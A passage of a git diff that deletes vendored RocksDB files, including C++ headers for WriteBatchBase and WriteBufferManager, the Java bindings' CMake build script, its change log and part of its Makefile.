-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <cstddef>
-
-namespace rocksdb {
-
-class Slice;
-class Status;
-class ColumnFamilyHandle;
-class WriteBatch;
-struct SliceParts;
-
-// Abstract base class that defines the basic interface for a write batch.
-// See WriteBatch for a basic implementation and WrithBatchWithIndex for an
-// indexed implemenation.
-class WriteBatchBase {
- public:
-  virtual ~WriteBatchBase() {}
-
-  // Store the mapping "key->value" in the database.
-  virtual Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) = 0;
-  virtual Status Put(const Slice& key, const Slice& value) = 0;
-
-  // Variant of Put() that gathers output like writev(2).  The key and value
-  // that will be written to the database are concatenations of arrays of
-  // slices.
-  virtual Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                     const SliceParts& value);
-  virtual Status Put(const SliceParts& key, const SliceParts& value);
-
-  // Merge "value" with the existing value of "key" in the database.
-  // "key->merge(existing, value)"
-  virtual Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) = 0;
-  virtual Status Merge(const Slice& key, const Slice& value) = 0;
-
-  // variant that takes SliceParts
-  virtual Status Merge(ColumnFamilyHandle* column_family, const SliceParts& key,
-                       const SliceParts& value);
-  virtual Status Merge(const SliceParts& key, const SliceParts& value);
-
-  // If the database contains a mapping for "key", erase it.  Else do nothing.
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const Slice& key) = 0;
-  virtual Status Delete(const Slice& key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status Delete(ColumnFamilyHandle* column_family,
-                        const SliceParts& key);
-  virtual Status Delete(const SliceParts& key);
-
-  // If the database contains a mapping for "key", erase it. Expects that the
-  // key was not overwritten. Else do nothing.
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const Slice& key) = 0;
-  virtual Status SingleDelete(const Slice& key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status SingleDelete(ColumnFamilyHandle* column_family,
-                              const SliceParts& key);
-  virtual Status SingleDelete(const SliceParts& key);
-
-  // If the database contains mappings in the range ["begin_key", "end_key"],
-  // erase them. Else do nothing.
-  virtual Status DeleteRange(ColumnFamilyHandle* column_family,
-                             const Slice& begin_key, const Slice& end_key) = 0;
-  virtual Status DeleteRange(const Slice& begin_key, const Slice& end_key) = 0;
-
-  // variant that takes SliceParts
-  virtual Status DeleteRange(ColumnFamilyHandle* column_family,
-                             const SliceParts& begin_key,
-                             const SliceParts& end_key);
-  virtual Status DeleteRange(const SliceParts& begin_key,
-                             const SliceParts& end_key);
-
-  // Append a blob of arbitrary size to the records in this batch. The blob will
-  // be stored in the transaction log but not in any other file. In particular,
-  // it will not be persisted to the SST files. When iterating over this
-  // WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-  // of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-  // encountered in the same order in which they were inserted. The blob will
-  // NOT consume sequence number(s) and will NOT increase the count of the batch
-  //
-  // Example application: add timestamps to the transaction log for use in
-  // replication.
-  virtual Status PutLogData(const Slice& blob) = 0;
-
-  // Clear all updates buffered in this batch.
-  virtual void Clear() = 0;
-
-  // Covert this batch into a WriteBatch.  This is an abstracted way of
-  // converting any WriteBatchBase(eg WriteBatchWithIndex) into a basic
-  // WriteBatch.
-  virtual WriteBatch* GetWriteBatch() = 0;
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  virtual void SetSavePoint() = 0;
-
-  // Remove all entries in this batch (Put, Merge, Delete, PutLogData) since the
-  // most recent call to SetSavePoint() and removes the most recent save point.
-  // If there is no previous call to SetSavePoint(), behaves the same as
-  // Clear().
-  virtual Status RollbackToSavePoint() = 0;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  virtual Status PopSavePoint() = 0;
-
-  // Sets the maximum size of the write batch in bytes. 0 means no limit.
-  virtual void SetMaxBytes(size_t max_bytes) = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h b/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h
deleted file mode 100644
index 856cf4b..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_buffer_manager.h
+++ /dev/null
@@ -1,100 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBufferManager is for managing memory allocation for one or more
-// MemTables.
-
-#pragma once
-
-#include <atomic>
-#include <cstddef>
-#include "rocksdb/cache.h"
-
-namespace rocksdb {
-
-class WriteBufferManager {
- public:
-  // _buffer_size = 0 indicates no limit. Memory won't be capped.
-  // memory_usage() won't be valid and ShouldFlush() will always return true.
-  // if `cache` is provided, we'll put dummy entries in the cache and cost
-  // the memory allocated to the cache. It can be used even if _buffer_size = 0.
-  explicit WriteBufferManager(size_t _buffer_size,
-                              std::shared_ptr<Cache> cache = {});
-  ~WriteBufferManager();
-
-  bool enabled() const { return buffer_size_ != 0; }
-
-  // Only valid if enabled()
-  size_t memory_usage() const {
-    return memory_used_.load(std::memory_order_relaxed);
-  }
-  size_t mutable_memtable_memory_usage() const {
-    return memory_active_.load(std::memory_order_relaxed);
-  }
-  size_t buffer_size() const { return buffer_size_; }
-
-  // Should only be called from write thread
-  bool ShouldFlush() const {
-    if (enabled()) {
-      if (mutable_memtable_memory_usage() > mutable_limit_) {
-        return true;
-      }
-      if (memory_usage() >= buffer_size_ &&
-          mutable_memtable_memory_usage() >= buffer_size_ / 2) {
-        // If the memory exceeds the buffer size, we trigger more aggressive
-        // flush. But if already more than half memory is being flushed,
-        // triggering more flush may not help. We will hold it instead.
-        return true;
-      }
-    }
-    return false;
-  }
-
-  void ReserveMem(size_t mem) {
-    if (cache_rep_ != nullptr) {
-      ReserveMemWithCache(mem);
-    } else if (enabled()) {
-      memory_used_.fetch_add(mem, std::memory_order_relaxed);
-    }
-    if (enabled()) {
-      memory_active_.fetch_add(mem, std::memory_order_relaxed);
-    }
-  }
-  // We are in the process of freeing `mem` bytes, so it is not considered
-  // when checking the soft limit.
-  void ScheduleFreeMem(size_t mem) {
-    if (enabled()) {
-      memory_active_.fetch_sub(mem, std::memory_order_relaxed);
-    }
-  }
-  void FreeMem(size_t mem) {
-    if (cache_rep_ != nullptr) {
-      FreeMemWithCache(mem);
-    } else if (enabled()) {
-      memory_used_.fetch_sub(mem, std::memory_order_relaxed);
-    }
-  }
-
- private:
-  const size_t buffer_size_;
-  const size_t mutable_limit_;
-  std::atomic<size_t> memory_used_;
-  // Memory that hasn't been scheduled to free.
-  std::atomic<size_t> memory_active_;
-  struct CacheRep;
-  std::unique_ptr<CacheRep> cache_rep_;
-
-  void ReserveMemWithCache(size_t mem);
-  void FreeMemWithCache(size_t mem);
-
-  // No copying allowed
-  WriteBufferManager(const WriteBufferManager&) = delete;
-  WriteBufferManager& operator=(const WriteBufferManager&) = delete;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/CMakeLists.txt b/thirdparty/rocksdb/java/CMakeLists.txt
deleted file mode 100644
index d67896c..0000000
--- a/thirdparty/rocksdb/java/CMakeLists.txt
+++ /dev/null
@@ -1,207 +0,0 @@
-cmake_minimum_required(VERSION 2.6)
-
-set(JNI_NATIVE_SOURCES
-        rocksjni/backupablejni.cc
-        rocksjni/backupenginejni.cc
-        rocksjni/checkpoint.cc
-        rocksjni/clock_cache.cc
-        rocksjni/columnfamilyhandle.cc
-        rocksjni/compaction_filter.cc
-        rocksjni/compaction_options_fifo.cc
-        rocksjni/compaction_options_universal.cc
-        rocksjni/comparator.cc
-        rocksjni/comparatorjnicallback.cc
-        rocksjni/compression_options.cc
-        rocksjni/env.cc
-        rocksjni/env_options.cc
-        rocksjni/filter.cc
-        rocksjni/ingest_external_file_options.cc
-        rocksjni/iterator.cc
-        rocksjni/loggerjnicallback.cc
-        rocksjni/lru_cache.cc
-        rocksjni/memtablejni.cc
-        rocksjni/merge_operator.cc
-        rocksjni/options.cc
-        rocksjni/ratelimiterjni.cc
-        rocksjni/remove_emptyvalue_compactionfilterjni.cc
-        rocksjni/cassandra_compactionfilterjni.cc
-        rocksjni/restorejni.cc
-        rocksjni/rocksdb_exception_test.cc
-        rocksjni/rocksjni.cc
-        rocksjni/slice.cc
-        rocksjni/snapshot.cc
-        rocksjni/sst_file_writerjni.cc
-        rocksjni/statistics.cc
-        rocksjni/statisticsjni.cc
-        rocksjni/table.cc
-        rocksjni/transaction_log.cc
-        rocksjni/ttl.cc
-        rocksjni/write_batch.cc
-        rocksjni/write_batch_test.cc
-        rocksjni/write_batch_with_index.cc
-        rocksjni/writebatchhandlerjnicallback.cc
-)
-
-set(NATIVE_JAVA_CLASSES
-        org.rocksdb.AbstractCompactionFilter
-        org.rocksdb.AbstractComparator
-        org.rocksdb.AbstractImmutableNativeReference
-        org.rocksdb.AbstractNativeReference
-        org.rocksdb.AbstractRocksIterator
-        org.rocksdb.AbstractSlice
-        org.rocksdb.AbstractWriteBatch
-        org.rocksdb.BackupableDBOptions
-        org.rocksdb.BackupEngine
-        org.rocksdb.BackupEngineTest
-        org.rocksdb.BlockBasedTableConfig
-        org.rocksdb.BloomFilter
-        org.rocksdb.Cache
-        org.rocksdb.CassandraCompactionFilter
-        org.rocksdb.CassandraValueMergeOperator
-        org.rocksdb.Checkpoint
-        org.rocksdb.ClockCache
-        org.rocksdb.ColumnFamilyHandle
-        org.rocksdb.ColumnFamilyOptions
-        org.rocksdb.CompactionOptionsFIFO
-        org.rocksdb.CompactionOptionsUniversal
-        org.rocksdb.Comparator
-        org.rocksdb.ComparatorOptions
-        org.rocksdb.CompressionOptions
-        org.rocksdb.DBOptions
-        org.rocksdb.DirectComparator
-        org.rocksdb.DirectSlice
-        org.rocksdb.Env
-        org.rocksdb.EnvOptions
-        org.rocksdb.ExternalSstFileInfo
-        org.rocksdb.Filter
-        org.rocksdb.FlushOptions
-        org.rocksdb.HashLinkedListMemTableConfig
-        org.rocksdb.HashSkipListMemTableConfig
-        org.rocksdb.IngestExternalFileOptions
-        org.rocksdb.Logger
-        org.rocksdb.LRUCache
-        org.rocksdb.MemTableConfig
-        org.rocksdb.MergeOperator
-        org.rocksdb.NativeLibraryLoader
-        org.rocksdb.Options
-        org.rocksdb.PlainTableConfig
-        org.rocksdb.RateLimiter
-        org.rocksdb.ReadOptions
-        org.rocksdb.RemoveEmptyValueCompactionFilter
-        org.rocksdb.RestoreOptions
-        org.rocksdb.RocksDB
-        org.rocksdb.RocksDBExceptionTest
-        org.rocksdb.RocksEnv
-        org.rocksdb.RocksIterator
-        org.rocksdb.RocksIteratorInterface
-        org.rocksdb.RocksMemEnv
-        org.rocksdb.RocksMutableObject
-        org.rocksdb.RocksObject
-        org.rocksdb.SkipListMemTableConfig
-        org.rocksdb.Slice
-        org.rocksdb.Snapshot
-        org.rocksdb.SnapshotTest
-        org.rocksdb.SstFileWriter
-        org.rocksdb.Statistics
-        org.rocksdb.StringAppendOperator
-        org.rocksdb.TableFormatConfig
-        org.rocksdb.TransactionLogIterator
-        org.rocksdb.TtlDB
-        org.rocksdb.VectorMemTableConfig
-        org.rocksdb.WBWIRocksIterator
-        org.rocksdb.WriteBatch
-        org.rocksdb.WriteBatch.Handler
-        org.rocksdb.WriteBatchTest
-        org.rocksdb.WriteBatchTestInternalHelper
-        org.rocksdb.WriteBatchWithIndex
-        org.rocksdb.WriteOptions
-)
-
-include_directories($ENV{JAVA_HOME}/include)
-include_directories($ENV{JAVA_HOME}/include/win32)
-include_directories(${PROJECT_SOURCE_DIR}/java)
-
-set(JAVA_TEST_LIBDIR ${PROJECT_SOURCE_DIR}/java/test-libs)
-set(JAVA_TMP_JAR ${JAVA_TEST_LIBDIR}/tmp.jar)
-set(JAVA_JUNIT_JAR ${JAVA_TEST_LIBDIR}/junit-4.12.jar)
-set(JAVA_HAMCR_JAR ${JAVA_TEST_LIBDIR}/hamcrest-core-1.3.jar)
-set(JAVA_MOCKITO_JAR ${JAVA_TEST_LIBDIR}/mockito-all-1.10.19.jar)
-set(JAVA_CGLIB_JAR ${JAVA_TEST_LIBDIR}/cglib-2.2.2.jar)
-set(JAVA_ASSERTJ_JAR ${JAVA_TEST_LIBDIR}/assertj-core-1.7.1.jar)
-set(JAVA_TESTCLASSPATH "${JAVA_JUNIT_JAR}\;${JAVA_HAMCR_JAR}\;${JAVA_MOCKITO_JAR}\;${JAVA_CGLIB_JAR}\;${JAVA_ASSERTJ_JAR}")
-
-if(NOT EXISTS ${PROJECT_SOURCE_DIR}/java/classes)
-  file(MAKE_DIRECTORY ${PROJECT_SOURCE_DIR}/java/classes)
-endif()
-
-if(NOT EXISTS ${JAVA_TEST_LIBDIR})
-  file(MAKE_DIRECTORY mkdir ${JAVA_TEST_LIBDIR})
-endif()
-
-if (DEFINED CUSTOM_REPO_URL)
-  set(SEARCH_REPO_URL ${CUSTOM_REPO_URL}/)
-  set(CENTRAL_REPO_URL ${CUSTOM_REPO_URL}/)
-else ()
-  set(SEARCH_REPO_URL "http://search.maven.org/remotecontent?filepath=")
-  set(CENTRAL_REPO_URL "http://central.maven.org/maven2/")
-endif()
-
-if(NOT EXISTS ${JAVA_JUNIT_JAR})
-  message("Downloading ${JAVA_JUNIT_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}junit/junit/4.12/junit-4.12.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_JUNIT_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_JUNIT_JAR})
-endif()
-if(NOT EXISTS ${JAVA_HAMCR_JAR})
-  message("Downloading ${JAVA_HAMCR_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_HAMCR_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_HAMCR_JAR})
-endif()
-if(NOT EXISTS ${JAVA_MOCKITO_JAR})
-  message("Downloading ${JAVA_MOCKITO_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}org/mockito/mockito-all/1.10.19/mockito-all-1.10.19.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_MOCKITO_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_MOCKITO_JAR})
-endif()
-if(NOT EXISTS ${JAVA_CGLIB_JAR})
-  message("Downloading ${JAVA_CGLIB_JAR}")
-  file(DOWNLOAD ${SEARCH_REPO_URL}cglib/cglib/2.2.2/cglib-2.2.2.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_CGLIB_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_CGLIB_JAR})
-endif()
-if(NOT EXISTS ${JAVA_ASSERTJ_JAR})
-  message("Downloading ${JAVA_ASSERTJ_JAR}")
-  file(DOWNLOAD ${CENTRAL_REPO_URL}org/assertj/assertj-core/1.7.1/assertj-core-1.7.1.jar ${JAVA_TMP_JAR} STATUS downloadStatus)
-  list(GET downloadStatus 0 error_code)
-  if(NOT error_code EQUAL 0)
-    message(FATAL_ERROR "Failed downloading ${JAVA_ASSERTJ_JAR}")
-  endif()
-  file(RENAME ${JAVA_TMP_JAR} ${JAVA_ASSERTJ_JAR})
-endif()
-
-if(WIN32)
-  set(JAVAC cmd /c javac)
-  set(JAVAH cmd /c javah)
-else()
-  set(JAVAC javac)
-  set(JAVAH javah)
-endif()
-
-execute_process(COMMAND ${JAVAC} ${JAVAC_ARGS} -cp ${JAVA_TESTCLASSPATH} -d ${PROJECT_SOURCE_DIR}/java/classes ${PROJECT_SOURCE_DIR}/java/src/main/java/org/rocksdb/util/*.java ${PROJECT_SOURCE_DIR}/java/src/main/java/org/rocksdb/*.java ${PROJECT_SOURCE_DIR}/java/src/test/java/org/rocksdb/*.java)
-execute_process(COMMAND ${JAVAH} -cp ${PROJECT_SOURCE_DIR}/java/classes -d ${PROJECT_SOURCE_DIR}/java/include -jni ${NATIVE_JAVA_CLASSES})
-add_library(rocksdbjni${ARTIFACT_SUFFIX} SHARED ${JNI_NATIVE_SOURCES})
-set_target_properties(rocksdbjni${ARTIFACT_SUFFIX} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/rocksdbjni${ARTIFACT_SUFFIX}.pdb")
-target_link_libraries(rocksdbjni${ARTIFACT_SUFFIX} rocksdb${ARTIFACT_SUFFIX} ${LIBS})
diff --git a/thirdparty/rocksdb/java/HISTORY-JAVA.md b/thirdparty/rocksdb/java/HISTORY-JAVA.md
deleted file mode 100644
index 731886a..0000000
--- a/thirdparty/rocksdb/java/HISTORY-JAVA.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# RocksJava Change Log
-
-## 3.13 (8/4/2015)
-### New Features
-* Exposed BackupEngine API.
-* Added CappedPrefixExtractor support.  To use such extractor, simply call useCappedPrefixExtractor in either Options or ColumnFamilyOptions.
-* Added RemoveEmptyValueCompactionFilter.
-
-## 3.10.0 (3/24/2015)
-### New Features
-* Added compression per level API.
-* MemEnv is now available in RocksJava via RocksMemEnv class.
-* lz4 compression is now included in rocksjava static library when running `make rocksdbjavastatic`.
-
-### Public API Changes
-* Overflowing a size_t when setting rocksdb options now throws an IllegalArgumentException, which removes the necessity for a developer to catch these Exceptions explicitly.
-* The set and get functions for tableCacheRemoveScanCountLimit are deprecated.
-
-
-## By 01/31/2015
-### New Features
-* WriteBatchWithIndex support.
-* Iterator support for WriteBatch and WriteBatchWithIndex
-* GetUpdatesSince support.
-* Snapshots carry now information about the related sequence number.
-* TTL DB support.
-
-## By 11/14/2014
-### New Features
-* Full support for Column Family.
-* Slice and Comparator support.
-* Default merge operator support.
-* RateLimiter support.
-
-## By 06/15/2014
-### New Features
-* Added basic Java binding for rocksdb::Env such that multiple RocksDB can share the same thread pool and environment.
-* Added RestoreBackupableDB
-
-## By 05/30/2014
-### Internal Framework Improvement
-* Added disOwnNativeHandle to RocksObject, which allows a RocksObject to give-up the ownership of its native handle.  This method is useful when sharing and transferring the ownership of RocksDB C++ resources.
-
-## By 05/15/2014
-### New Features
-* Added RocksObject --- the base class of all RocksDB classes which holds some RocksDB resources in the C++ side.
-* Use environmental variable JAVA_HOME in Makefile for RocksJava
-### Public API changes
-* Renamed org.rocksdb.Iterator to org.rocksdb.RocksIterator to avoid potential confliction with Java built-in Iterator.
-
-## By 04/30/2014
-### New Features
-* Added Java binding for MultiGet.
-* Added static method RocksDB.loadLibrary(), which loads necessary library files.
-* Added Java bindings for 60+ rocksdb::Options.
-* Added Java binding for BloomFilter.
-* Added Java binding for ReadOptions.
-* Added Java binding for memtables.
-* Added Java binding for sst formats.
-* Added Java binding for RocksDB Iterator which enables sequential scan operation.
-* Added Java binding for Statistics
-* Added Java binding for BackupableDB.
-
-### DB Benchmark
-* Added filluniquerandom, readseq benchmark.
-* 70+ command-line options.
-* Enabled BloomFilter configuration.
-
-## By 04/15/2014
-### New Features
-* Added Java binding for WriteOptions.
-* Added Java binding for WriteBatch, which enables batch-write.
-* Added Java binding for rocksdb::Options.
-* Added Java binding for block cache.
-* Added Java version DB Benchmark.
-
-### DB Benchmark
-* Added readwhilewriting benchmark.
-
-### Internal Framework Improvement
-* Avoid a potential byte-array-copy between c++ and Java in RocksDB.get.
-* Added SizeUnit in org.rocksdb.util to store consts like KB and GB.
-
-### 03/28/2014
-* RocksJava project started.
-* Added Java binding for RocksDB, which supports Open, Close, Get and Put.
diff --git a/thirdparty/rocksdb/java/Makefile b/thirdparty/rocksdb/java/Makefile
deleted file mode 100644
index b29447b..0000000
--- a/thirdparty/rocksdb/java/Makefile
+++ /dev/null
@@ -1,231 +0,0 @@
-NATIVE_JAVA_CLASSES = org.rocksdb.AbstractCompactionFilter\
-	org.rocksdb.AbstractComparator\
-	org.rocksdb.AbstractSlice\
-	org.rocksdb.BackupEngine\
-	org.rocksdb.BackupableDBOptions\
-	org.rocksdb.BlockBasedTableConfig\
-	org.rocksdb.BloomFilter\
-	org.rocksdb.Checkpoint\
-	org.rocksdb.ClockCache\
-	org.rocksdb.CassandraCompactionFilter\
-	org.rocksdb.CassandraValueMergeOperator\
-	org.rocksdb.ColumnFamilyHandle\
-	org.rocksdb.ColumnFamilyOptions\
-	org.rocksdb.CompactionOptionsFIFO\
-	org.rocksdb.CompactionOptionsUniversal\
-	org.rocksdb.Comparator\
-	org.rocksdb.ComparatorOptions\
-	org.rocksdb.CompressionOptions\
-	org.rocksdb.DBOptions\
-	org.rocksdb.DirectComparator\
-	org.rocksdb.DirectSlice\
-	org.rocksdb.Env\
-	org.rocksdb.EnvOptions\
-	org.rocksdb.FlushOptions\
-	org.rocksdb.Filter\
-	org.rocksdb.IngestExternalFileOptions\
-	org.rocksdb.HashLinkedListMemTableConfig\
-	org.rocksdb.HashSkipListMemTableConfig\
-	org.rocksdb.Logger\
-	org.rocksdb.LRUCache\
-	org.rocksdb.MergeOperator\
-	org.rocksdb.Options\
-	org.rocksdb.PlainTableConfig\
-	org.rocksdb.RateLimiter\
-	org.rocksdb.ReadOptions\
-	org.rocksdb.RemoveEmptyValueCompactionFilter\
-	org.rocksdb.RestoreOptions\
-	org.rocksdb.RocksDB\
-	org.rocksdb.RocksEnv\
-	org.rocksdb.RocksIterator\
-	org.rocksdb.RocksMemEnv\
-	org.rocksdb.SkipListMemTableConfig\
-	org.rocksdb.Slice\
-	org.rocksdb.SstFileWriter\
-	org.rocksdb.Statistics\
-	org.rocksdb.TransactionLogIterator\
-	org.rocksdb.TtlDB\
-	org.rocksdb.VectorMemTableConfig\
-	org.rocksdb.Snapshot\
-	org.rocksdb.StringAppendOperator\
-	org.rocksdb.WriteBatch\
-	org.rocksdb.WriteBatch.Handler\
-	org.rocksdb.WriteOptions\
-	org.rocksdb.WriteBatchWithIndex\
-	org.rocksdb.WBWIRocksIterator
-
-NATIVE_JAVA_TEST_CLASSES = org.rocksdb.RocksDBExceptionTest\
-    org.rocksdb.WriteBatchTest\
-    org.rocksdb.WriteBatchTestInternalHelper
-
-ROCKSDB_MAJOR = $(shell egrep "ROCKSDB_MAJOR.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_MINOR = $(shell egrep "ROCKSDB_MINOR.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_PATCH = $(shell egrep "ROCKSDB_PATCH.[0-9]" ../include/rocksdb/version.h | cut -d ' ' -f 3)
-
-NATIVE_INCLUDE = ./include
-ARCH := $(shell getconf LONG_BIT)
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux$(ARCH).jar
-ifeq ($(PLATFORM), OS_MACOSX)
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar
-endif
-
-JAVA_TESTS = org.rocksdb.BackupableDBOptionsTest\
-	org.rocksdb.BackupEngineTest\
-	org.rocksdb.BlockBasedTableConfigTest\
-	org.rocksdb.util.BytewiseComparatorTest\
-	org.rocksdb.CheckPointTest\
-	org.rocksdb.ClockCacheTest\
-	org.rocksdb.ColumnFamilyOptionsTest\
-	org.rocksdb.ColumnFamilyTest\
-	org.rocksdb.CompactionOptionsFIFOTest\
-	org.rocksdb.CompactionOptionsUniversalTest\
-	org.rocksdb.CompactionPriorityTest\
-	org.rocksdb.CompactionStopStyleTest\
-	org.rocksdb.ComparatorOptionsTest\
-	org.rocksdb.ComparatorTest\
-	org.rocksdb.CompressionOptionsTest\
-	org.rocksdb.CompressionTypesTest\
-	org.rocksdb.DBOptionsTest\
-	org.rocksdb.DirectComparatorTest\
-	org.rocksdb.DirectSliceTest\
-	org.rocksdb.EnvOptionsTest\
-	org.rocksdb.IngestExternalFileOptionsTest\
-	org.rocksdb.util.EnvironmentTest\
-	org.rocksdb.FilterTest\
-	org.rocksdb.FlushTest\
-	org.rocksdb.InfoLogLevelTest\
-	org.rocksdb.KeyMayExistTest\
-	org.rocksdb.LoggerTest\
-    org.rocksdb.LRUCacheTest\
-	org.rocksdb.MemTableTest\
-	org.rocksdb.MergeTest\
-	org.rocksdb.MixedOptionsTest\
-	org.rocksdb.MutableColumnFamilyOptionsTest\
-	org.rocksdb.NativeLibraryLoaderTest\
-	org.rocksdb.OptionsTest\
-	org.rocksdb.PlainTableConfigTest\
-	org.rocksdb.RateLimiterTest\
-	org.rocksdb.ReadOnlyTest\
-	org.rocksdb.ReadOptionsTest\
-	org.rocksdb.RocksDBTest\
-	org.rocksdb.RocksDBExceptionTest\
-	org.rocksdb.RocksEnvTest\
-	org.rocksdb.RocksIteratorTest\
-	org.rocksdb.RocksMemEnvTest\
-	org.rocksdb.util.SizeUnitTest\
-	org.rocksdb.SliceTest\
-	org.rocksdb.SnapshotTest\
-	org.rocksdb.SstFileWriterTest\
-	org.rocksdb.TransactionLogIteratorTest\
-	org.rocksdb.TtlDBTest\
-	org.rocksdb.StatisticsTest\
-	org.rocksdb.StatisticsCollectorTest\
-	org.rocksdb.WALRecoveryModeTest\
-	org.rocksdb.WriteBatchHandlerTest\
-	org.rocksdb.WriteBatchTest\
-	org.rocksdb.WriteBatchThreadedTest\
-	org.rocksdb.WriteOptionsTest\
-	org.rocksdb.WriteBatchWithIndexTest
-
-MAIN_SRC = src/main/java
-TEST_SRC = src/test/java
-OUTPUT = target
-MAIN_CLASSES = $(OUTPUT)/classes
-TEST_CLASSES = $(OUTPUT)/test-classes
-JAVADOC = $(OUTPUT)/apidocs
-
-BENCHMARK_MAIN_SRC = benchmark/src/main/java
-BENCHMARK_OUTPUT = benchmark/target
-BENCHMARK_MAIN_CLASSES = $(BENCHMARK_OUTPUT)/classes
-
-SAMPLES_MAIN_SRC = samples/src/main/java
-SAMPLES_OUTPUT = samples/target
-SAMPLES_MAIN_CLASSES = $(SAMPLES_OUTPUT)/classes
-
-JAVA_TEST_LIBDIR = test-libs
-JAVA_JUNIT_JAR = $(JAVA_TEST_LIBDIR)/junit-4.12.jar
-JAVA_HAMCR_JAR = $(JAVA_TEST_LIBDIR)/hamcrest-core-1.3.jar
-JAVA_MOCKITO_JAR = $(JAVA_TEST_LIBDIR)/mockito-all-1.10.19.jar
-JAVA_CGLIB_JAR = $(JAVA_TEST_LIBDIR)/cglib-2.2.2.jar
-JAVA_ASSERTJ_JAR = $(JAVA_TEST_LIBDIR)/assertj-core-1.7.1.jar
-JAVA_TESTCLASSPATH = $(JAVA_JUNIT_JAR):$(JAVA_HAMCR_JAR):$(JAVA_MOCKITO_JAR):$(JAVA_CGLIB_JAR):$(JAVA_ASSERTJ_JAR)
-
-MVN_LOCAL = ~/.m2/repository
-
-# Set the default JAVA_ARGS to "" for DEBUG_LEVEL=0
-JAVA_ARGS? =
-
-JAVAC_ARGS? =
-
-# When debugging add -Xcheck:jni to the java args
-ifneq ($(DEBUG_LEVEL),0)
-	JAVA_ARGS = -ea -Xcheck:jni
-	JAVAC_ARGS = -Xlint:deprecation -Xlint:unchecked
-endif
-
-SEARCH_REPO_URL?=http://search.maven.org/remotecontent?filepath=
-CENTRAL_REPO_URL?=http://central.maven.org/maven2/
-
-clean:
-	$(AM_V_at)rm -rf include/*
-	$(AM_V_at)rm -rf test-libs/
-	$(AM_V_at)rm -rf $(OUTPUT)
-	$(AM_V_at)rm -rf $(BENCHMARK_OUTPUT)
-	$(AM_V_at)rm -rf $(SAMPLES_OUTPUT)
-
-
-javadocs: java
-	$(AM_V_GEN)mkdir -p $(JAVADOC)
-	$(AM_V_at)javadoc -d $(JAVADOC) -sourcepath $(MAIN_SRC) -subpackages org
-
-javalib: java java_test javadocs
-
-java:
-	$(AM_V_GEN)mkdir -p $(MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -d $(MAIN_CLASSES)\
-		$(MAIN_SRC)/org/rocksdb/util/*.java\
-		$(MAIN_SRC)/org/rocksdb/*.java
-	$(AM_V_at)@cp ../HISTORY.md ./HISTORY-CPP.md
-	$(AM_V_at)@rm -f ./HISTORY-CPP.md
-	$(AM_V_at)javah -cp $(MAIN_CLASSES) -d $(NATIVE_INCLUDE) -jni $(NATIVE_JAVA_CLASSES)
-
-sample: java
-	$(AM_V_GEN)mkdir -p $(SAMPLES_MAIN_CLASSES)
-	$(AM_V_at)javac $(JAVAC_ARGS) -cp $(MAIN_CLASSES) -d $(SAMPLES_MAIN_CLASSES) $(SAMPLES_MAIN_SRC)/RocksDBSample.java
-	$(AM_V_at)@rm -rf /tmp/rocksdbjni
